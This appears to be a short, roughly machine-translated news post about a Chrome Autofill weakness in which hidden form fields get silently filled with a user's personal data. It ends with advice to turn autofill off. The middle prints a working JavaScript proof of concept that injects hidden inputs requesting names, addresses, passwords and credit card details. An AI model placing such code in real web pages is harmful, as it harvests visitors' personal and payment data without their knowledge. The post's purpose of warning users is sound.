Google Chrome has not yet fixed a known vulnerability in Autofill (automatic fill) published for 2013 for the first time.
With this vulnerability, a hacker can hide the fields of a form connections in one by clicking here, and Chrome will fill in your personal information on its own if you choose to use Autofill.
The following gif describes the problem:
The hampie user of GitHub presented it with the following JavaScript:
var autocompletes = ['name', 'honorific-prefix', 'given-name', 'additional-name', 'family-name', 'honorific-suffix', 'nickname', 'username', 'new-password ', 'current-password', 'organization-title', 'organization', 'street-address', 'address-line1', 'address-line2', 'address-line3', 'address-level4', 'address -level3', 'address-level2', 'address-level1', 'country', 'country-name', 'postal-code', 'cc-name', 'cc-given-name', 'cc-additional -name', 'cc-family-name', 'cc-exp', 'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-type', 'transaction-currency ', 'transaction-amount', 'language', 'bday', 'bday-day', 'bday-month', 'bday-year', 'sex', 'url', 'photo', 'tel', 'tel-country-code', 'tel-national', 'tel-area-code', 'tel-local', 'tel-local-prefix', 'tel-local-suffix', 'tel-extension', 'impp' ]; emailField.addEventListener('focus', function() { var wrap = autocompletes.reduce(function(wrapper, field) { var input = document.createElement('input'); // Make them not focussable input.tabIndex = -1 ; input.autocomplete = field; wrapper.appendChild(input); return wrapper; }, document.createElement('div')); // Hide the wrapper wrap.classList.add('hidden'); form.appendChild(wrap ); // Inject the autocompletes once this.removeEventListener('focus', arguments.callee); });
Of course, we recommend turning off Chrome's auto-fill feature immediately.
Let's see the fastest way fromactivationof autocomplete in Chrome:
Open the address:
chrome://settings/autofill
and disable the function:
That's it. You are safe from this exploit.